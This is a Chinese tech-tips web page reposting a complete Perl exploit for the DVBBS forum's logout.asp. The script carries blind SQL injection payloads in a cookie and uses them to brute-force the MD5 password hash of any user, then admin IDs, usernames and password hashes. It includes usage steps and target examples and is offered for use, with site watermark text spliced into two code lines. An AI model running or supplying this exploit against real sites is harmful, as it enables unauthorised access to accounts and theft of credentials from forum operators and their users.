您现在的位置: 电脑常识文选 - 网络应用 - 获取任意用户MD5加密信息的测试程序
网络应用

获取任意用户MD5加密信息的测试程序

--------------------[获取任意用户MD5加密信息的测试程序:  

#!/usr/bin/perl

#Codz By PsKey<PsKey@hotmail.com>

#Exploit of DVBBS's logout.asp

 

#--------------------------------------------------------------------------

#  本脚本针对动网论坛logout.asp文件缺陷而写,可以推算出所有用户

#  MD5加密密码;另外可以自动破解后台管理员ID、username、password

#  脚本参照最新版本编写,若低版本出现不能用的情况,请自行修改程序

#  脚本利用方法:

#  1:在目标论坛以 ilikecat/catlikeme 注册一用户,并得到此用户的 userid

#  2:再另注册一任意用户(此步不可少)

#  3:运行脚本,按帮助输入命令参数

#  如果是MSSQL版,请把这段糟糕的脚本扔到一边

#--------------------------------------------------------------------------

 

$|=1;

use Socket;

use Getopt::Std;

getopt('hpwium');

 

print "\n             ===================================================\n";

print "                       Exploit of DVBBS's logout.asp\n";

print "                     Codz By PsKey<PsKey\@hotmail.com>     \n";

print "                       http://www.isgrey.com/ && c4st.51.net              \n";

print "                       Thanx Envymask<130\@21cn.com>            \n";

print "             ===================================================\n";

 

&usage unless ( defined($opt_h) && defined($opt_w) && defined($opt_i) && defined($opt_m));

 

$host=$opt_h;

$port=$opt_p||80;

$path=$opt_w;

$userid=$opt_i;

$user=$opt_u;

$mode=$opt_m;

 

if ($opt_m eq "p") {

&usage unless defined($opt_u);

print "\nPlease wait...\n\n";

for ($j=1;$j<=16;$j++) {

@dic1=(0..9);

@dic2=(a..f);

@dic=(@dic1,@dic2);

&first;

for ($i=0;$i<@dic;$i++) {

print "$dic[$i]";

$key=$pws.$dic[$i];

$target = "ilikecat'%20and%20exists%20(select%20UserID%20from%20[user]%20where%20UserName='$user'%20and%20left(UserPassword,$j)='$key')%20and%20'1'='1";

&second;

if ("@in" !~ /ilikecat/)  {

    $th=$j.th;

    print "\n\/\/------------The $th word of the password is $dic[$i]";

    $pws=$pws.$dic[$i];

    last;

}

}

}

print "\n\nSuccessful,the full password of $user is $pws.\n";

}

 

elsif ($opt_m eq "b") {

 

#Crack ID

print "\n\#\#\#\#\#\#\#\#\#\#\#Start cracking admin's id...";

&first;

for ($i=0;$i<=50;$i++) {

$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$i)%20and%20'1'='1";

&second;

if ("@in" !~ /ilikecat/)  {

    print "\n--------->>There is one admin's id $i";

    push (@id,$i);

    &first;

}

}

print "\n\#\#\#\#\#\#\#\#\#\#\#End cracking admin's id...\n";

sleep(2);

 

#Crack the length of admin's username

print "\n\#\#\#\#\#\#\#\#\#\#\#Start Cracking the length of admin's username...\n";

for ($j=0;$j<@id;$j++) {

print "  \|\-\>cracking username's length which id is $id[$j] ...";

&first;

for ($i=0;$i<=50;$i++) {

$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20len(username)=$i%20and%20id=$id[$j])%20and%20'1'='1";

&second;

if ("@in" !~ /ilikecat/)  {

    print "\n--------->>The length of $id[$j] is $i";

    push (@len,$i);=版权所有  软件 下载  学院  版权所有=

    &first;

    last;

}

}

}

print "\n\#\#\#\#\#\#\#\#\#\#\#End Cracking the length of admin's username...\n";

sleep(2);

 

#Crack admin's username

print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's username...\n";

@dic1=(0..9);

@dic2=(a..z);

@dic=(@dic1,@dic2);

for ($j=0;$j<@id;$j++) {

$pws="";

print "  \|\-\>cracking username which id is $id[$j] ...";

  OUTER: for ($k=1;$k<=$len[$j];$k++) {

  &first;

  USERNAME: for ($i=0;$i<@dic;$i++) {

  print "$dic[$i].";

  $key=$pws.$dic[$i];

  $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(username,$k)='$key')%20and%20'1'='1";

  &second;

  if ("@in" !~ /ilikecat/)  {

    $th=$k.th;

    print "\n--------->>The $th word of $id[$j] username is $dic[$i]";

    $pws=$pws.$dic[$i];

    last USERNAME;

        }

  if ($dic[$i] eq "z") {

    print "\ni can't crack this admin's name,maybe it is chinese.\n";

    push (@user,"\?");

    last OUTER;

        }

      }

    }

  push (@user,$pws);

  print "\n========>>The username is $pws which id is $id[$j]\n";

}

print "\n\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's username...\n";

sleep(2);

 

#Crack admin's password

print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's password...\n";

@dic1=(0..9);

@dic2=(a..f);

@dic=(@dic1,@dic2);

for ($j=0;$j<@id;$j++) {

$pws="";

print "  \|\-\>cracking password which id is $id[$j] ...";

  for ($k=1;$k<=16;$k++) {

  &first;

  PASSWORD: for ($i=0;$i<@dic;$i++) {

  print "$dic[$i].";

  $key=$pws.$dic[$i];

  $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(password,$k)='$key')%20and%20'1'='1";

  &second;

  if ("@in" !~ /ilikecat/)  {

    $th=$k.th;

    print "\n--------->>The $th word of $id[$j] password is $dic[$i]";

    $pws=$pws.$dic[$i];

    last PASSWORD;

        }

      }

    }

  push (@pass,$pws);

  print "\n\n========>>The password is $pws which id is $id[$j]\n\n";

}

print "\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's password...\n\n";

print "We got them now:\n";

printf("%-4s %-20s %-16s\n",ID,UserName,PassWord);

for ($i=0;$i<@id;$i++) {

printf("%-4d %-20s %-16s\n",$id[$i],$user[$i],$pass[$i]);

}

}

 

else {

&usage;

}

 

sub first {

$str="username=ilikecat&password=catlikeme&CookieDate=1";

$len=length($str);

$req = "GET $path/login.asp?action=chk&username=ilikecat&password=catlikeme HTTP/1.1\n".

       "Referer: http://$host$path/login.asp\n".

       "Host: $host\n".

       "Content-Length: $len\n".

       "Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show;upNum=0\n".

       "\n".

       "$str\n\n";

print "\n.";

sendraw($req);

$req0 = "GET $path/index.asp HTTP/1.0\n".

        "Referer: http://$host$path/index.asp\n".

        "Host: $host\n".

        "Cookie: aspsky=userid=$userid&usercookies=0&userhidden=2&password=aac9ac496fa5ea8e&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=ilikecat; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";

print ".\n";

sendraw($req0);

}

 

sub second {

$req1 = "GET $path/logout.asp HTTP/1.0\n".

        "Host: $host\n".

        "Cookie: aspsky=userid=$userid&usercookies=1&userhidden=2&username=$target; iscookies=0; BoardList=BoardID=Show; \n\n";

print ".";

@res = sendraw($req1);

$req2 = "GET $path/index.asp?action=show HTTP/1.0\n".

        "Referer: http://$host$path/index.asp?action=show \n".

        "Host: $host\n".

        "Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";

print ".";

@in = sendraw($req2);

}

 

sub usage {

print qq~

Usage: $0 -h <Host> [-p <port>] -w <path> -i <userid> -m <mode> [-u <user>]

    -h   =hostname you want to attack

    -p   =port,80 default

    -w   =the web path such as "/dvbbs"

    -i   =the userid of ilikecat

    -m   =only two choice,b<background> and p<proscenium>(This option need -u)

    -u   =the user you want to crack

Eg: 1.Crack proscenium

     $0 -h http://www.target.com/ -p 80 -w /dvbbs -i 2 -m p -u admin 

    2.Crack background

     $0 -h http://www.target.com/ -p 80 -w /dvbbs -i 2 -m b

~;

exit;

}

 

sub sendraw {

    my ($req) = @_;

    my $target;

    $target = inet_aton($host) || die("inet_aton problems\n");

    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");

    if(connect(S,pack "SnA4x8",2,$port,$target)){

        select(S);

    $| = 1;

        print $req;

    my @res = <S>;

        select(STDOUT);

    close(S);

        return @res;

    }

    else { =版权所有  软件 下载  学院  版权所有=

    die("Can't connect...\n");

    }

}

(出处:http://www.13pc.com)


电脑常识文选·网络应用 © 2006 - 2011 版权所有